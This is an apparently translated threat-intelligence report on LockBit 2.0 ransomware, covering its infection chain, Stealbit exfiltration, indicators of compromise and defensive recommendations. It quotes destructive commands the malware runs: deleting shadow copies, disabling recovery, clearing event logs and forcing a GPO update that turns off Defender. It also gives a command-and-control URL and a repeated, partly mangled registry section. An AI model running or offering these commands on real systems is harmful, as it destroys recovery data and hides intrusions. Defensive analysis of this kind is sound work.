Lockbit Ransomware

The latest features of the attack, previously known as the “.abcd” ransomware, which has been seen since early September 2019, are the Lockbit ransomware (2.0). After infiltrating the target network, it uses open-source tools such as mimikatz to gain authorization. It then encrypts the target system and leaves a ransom note.

Initial Access

In order for the ransomware to work on the opposite network, it must infiltrate the target system. This infiltration can be physical or web-based. Phishing, Web-enabled application breaches, Zero-Day, weak passwords, disclosed RDP, VPN information, or Brute-Force attacks on these protocols can cause the ransomware to infect the target network.

Infection

The malware decides to damage the system by checking the user’s language information. If the language information is detected as Eastern European, the ransomware exits the system without infecting it. If the language information does not match the software filter, it provides control of the necessary analyzers, and if the authorization is not sufficient, it performs privilege escalation with tools such as mimikatz. Then, it deletes the Shadow-Copies from the system to prevent the data from being recovered again. The system lists the information of the host configuration, remote sharing and storage devices and starts the encryption process by excluding basic operating system functions. Lockbit can encrypt the compromised network without any human intervention, copy itself on the system and perform lateral movement using SMB, RDP protocols. Then, to extract data, it usually uses the Stealbit application to extract data over HTTP. At this stage, the attacker can also use Rclone or MEGAsync applications.

One of the reasons why Lockbit is so dangerous is its high encryption speed. It encrypts the system quickly using AES (symmetric) encryption.

Indicators (IOC)

Language Indicators

The codes and filters used by the ransomware for the language filter are as follows.

List view:

By performing the list check, if the user language is Eastern European Country, it will be exited from the system.

Powershell Commands

Powershell actions during the execution of the ransomware on the system are as follows.

cmd.exe /c vssadmin Delete Shadows /All /Quiet
Deletes shadow-copies to prevent data recovery.
cmd.exe /c bcdedit /set {default} recoveryenabled No
Disables Win10 recovery to prevent data recovery.
cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
Ignores boot failures.
cmd.exe /c wevtutil cl security
Deletes security logs.
cmd.exe /c wevtutil cl system
Deletes system logs.
cmd.exe /c wevtutil cl application
Deletes application logs.
cmd.exe “C:WindowsSystem32cmd.exe” /C ping 127.0.0.7 -n 3 >Nul&fsutil file setZeroData offset=0 length=524288 “C:UsersfredDesktopLsystem-234-bit.exe” & Del /f /q “C:UsersfredDesktopLsystem-234-bit.exe”
It deletes itself from the system.
cmd.exe “C:WindowsSystem32cmd.exe” /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Deletes all shadow-copies in the system.

Registery Keys

UAC ( User Account Control)
Key:HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindows NTCurrentVersionICMCalibration
Data:< Lockbit 2.0 Ransomware path >
LockBit 2.0 Walpaper Change
Key:HKEY_CLASSES_ROOTLockbitshellOpenCommand
Data:”C:Windowssystem32mshta.exe” “C:Users\DesktopLockBit_Ransomware.hta”
Key:HKEY_CLASSES_ROOTLockbitDefaultIcon
Data:C:Windows< First 6 characters of LockBit 2.0 Decrytion ID >.ico
Kalıcılık (Persistance)
Key:HKEY_CURENT_USERSoftwareMicrosoftWindowsCurrentVersionRun{GUID}
Data:C:Useres< username >DestktopLockbit_Ransomware.hta
Data:< Lockbit 2.0 Ransomware path >
Şifreleme (Encrytion)
Key:HKEY_CURRENT_USERSoftware< LockBit2.0ID >Private
Key:HKEY_CURRENT_USERSoftware< LockBit2.0ID >Public
Lockbit 2.0 İkon Lokasyonu:HKEY_LOCAL_MACHINESoftwareClasses.lockbitDefaultIcon
Masa Üstü Modifikasyonları (Destktop Modification)
Key:HKEY_CURRENT_USERControl PanelDesktop
String Value:%APPDATA%LocalTemp.tmp.bmp
String Value:TitleWalpaper = 0
String Value:WalpaperStyle = 2

Registry Keys

UAC (User Account Control)
Key:HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindows NTCurrentVersionICMCalibration
Data:< Lockbit 2.0 Ransomware path >
LockBit 2.0 Wallpaper Change
Key:HKEY_CLASSES_ROOTLockbitshellOpenCommand
Data:”C:Windowssystem32mshta.exe” “C:Users\DesktopLockBit_Ransomware.hta”
Key:HKEY_CLASSES_ROOTLockbitDefaultIcon
Data:C:Windows< First 6 characters of LockBit 2.0 Decrytion ID >.ico
Permanence
Key:HKEY_CURENT_USERSoftwareMicrosoftWindowsCurrentVersionRun{GUID}
Data:C:Useres< username >DestktopLockbit_Ransomware.hta
Data:< Lockbit 2.0 Ransomware path >
Encryption
Key:HKEY_CURRENT_USERSoftware< LockBit2.0ID >Private
Key:HKEY_CURRENT_USERSoftware< LockBit2.0ID >Public
Lockbit 2.0 Icon Location:HKEY_LOCAL_MACHINESoftwareClasses.lockbitDefaultIcon
Desktop Modifications
Key:HKEY_CURRENT_USERControl PanelDesktop
String Value:%APPDATA%LocalTemp.tmp.bmp
String Value:TitleWalpaper = 0
String Value:WalpaperStyle = 2
Created Files and Extensions
C:Users< username >DesktopLockBit_Ransomware.hta (LockBit 2.0 hta file)
C:Windows< username >AppdataLocalTemp< LockBit 2.0 Walpaper >.tmp.bmp (Lockbit 2.0 Wallpaper)
Disabling Windows Defender with GPO Updates
[General]
Versions=%s
DisplayName=%s
[SoftwarePoliciesMicrosoftWindows Defender;DisableAntiSpyware]
[ SoftwarePoliciesMicrosoftWindows Defender Real-Time Protection;DisableRealTimeMonitoring]
[ SoftwarePoliciesMicrosoftWindows DefenderSpynet;SubmitSamplesConsent]
[ SoftwarePoliciesMicrosoftWindows DefenderThreats;Threats_ThreatsSeverityDefaultAction]
[ SoftwarePoliciesMicrosoftWindows DefenderUX Configuration;Notification_Suppress]
Powershell Command (Force GPO Policy)
powershell.exe -Command “Get-ADComputer -filter * -Searchbase ‘%s’ | foreach{ InvokeGPUpdate -computer $_.name -force -RandomDelayInMinutes 0}”
Anti-Recovery Command
C:WindowsSystem32cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
File Extension
.lockbit
Lockbit 2.0 Ransom Note
Restore-My-Files.txt
Encryption and Data Exfiltration – Stealbit

Stealbit is a highly obfuscated application that enables data theft. It implements the Microsoft input/output (I/O) model to maximize the efficiency of the data exfiltration activity. The faster and more efficient the data exfiltration process, the lower the chance of detection.

Stealbit loads the necessary strings and modules using bitwise operations on the system. To extract data, the IP addresses connected are encrypted using the logical “and” operation with the value counted in the ECX register.

Key: 0xF8 0x72 0x12 0x13 0xA6 0x25 0x3C 0xE3 0xF9 0x91 0x2E 0x18 0x20 0x22 0x76

IP Addresses Embedded by Encoding

Sample String Encode and Decode Routine

Decoded IP Address Lists

Performing the Decode Process During Runtime

Stelabit URL Example

hxxp://185.182.193.120/06599379103BD9028AB56AE0EBED457D0

Network Identifier

When the host communicates with the command and control server, it sends a request to the server with a hexadecimal length of 32-33 with the PUT method within the framework of the HTTP protocol. For example:

PUT /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1.
Self-Delete Command

ping 127.0.0.7 –n 7 > Nul & fsutil file setZeroData offset=0 length=< Stealbit file path > & Del /f /q
Hash Records

MD5 SHA-1 SHA-256
af9ff037caca1f316e7d05db86dbd882 844e9b219aaecb26de4994a259f822500fb75ae1 f3e891a2a39dd948cd85e1c8335a83e640d0987dbd48c16001a02f6b7c1733ae
4d25a9242eac26b2240336fb94d62b1e c7b2d4a22f788b1b942f993fff33f233dca960ce f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202
b7f1120bcff47ab77e74e387805feabe a185904a46b0cb87d38057fc591a31e6063cdd95 4de287e0b05e138ab942d71d1d4d2ad5fb7d46a336a446f619091bdace4f2d0a
84866fca8a5ceb187bca8e257e4f875a 038bc02c0997770a1e764d0203303ef8fcad11fb acad2d9b291b5a9662aa1469f96995dc547a45e391af9c7fa24f5921b0128b2c
f91095ae0e0632b0f630e0c4eb12ba10 6c4040f2a76e61c649e1ff4ac564a5951c15d1fa 717585e9605ac2a971b7c7537e6e311bab9db02ecc6451e0efada9b2ff38b474
6fc418ce9b5306b4fd97f815cc9830e5 95838a8beb04cfe6f1ded5ecbd00bf6cf97cd564 0545f842ca2eb77bcac0fd17d6d0a8c607d7dbc8669709f3096e5c1828e1c049
b0916724ff4118bf213e31cd198c0afd 12ac32d012e818c78d6db790f6e11838ca75db88 4bb152c96ba9e25f293bbc03c607918a4452231087053a8cb1a8accb1acc92fd
66b9ccb41b135f302b3143a5d53f4842 3d532697163e7c33c7c906e8efbb08282d3efd75 d089d57b8b2b32ee9816338e96680127babc5d08a03150740a8459c29ab3ba78
MITER ATT&CK MATRIX

Affected Systems

The following system is indicated to be affected;

Windows Operating System
Recommended Protection Methods

In case of possible ransomware infiltration into the system, offline data backup should be made in the trusted area.
Access to all accounts should be provided with a password and passwords should be strong, and passwords should be unique by applying a special password policy especially for authorized and admin accounts.
Multi-factor authentication should be used when accessing critical systems such as mail, VPN and similar.
Operating System and used Software should be up to date.
Unnecessary admin shares should be removed or authority reduction should be applied.
SMB traffic should be allowed only for a certain amount of admin accounts using a host-based firewall.
File protection feature should be activated on Windows to prevent unauthorized changes to critical files.
The spread of ransomware can be stopped by dividing the existing network into subnets.
Using EDR to identify, detect and investigate anomalies is an effective solution to prevent malware from potentially spreading within the network.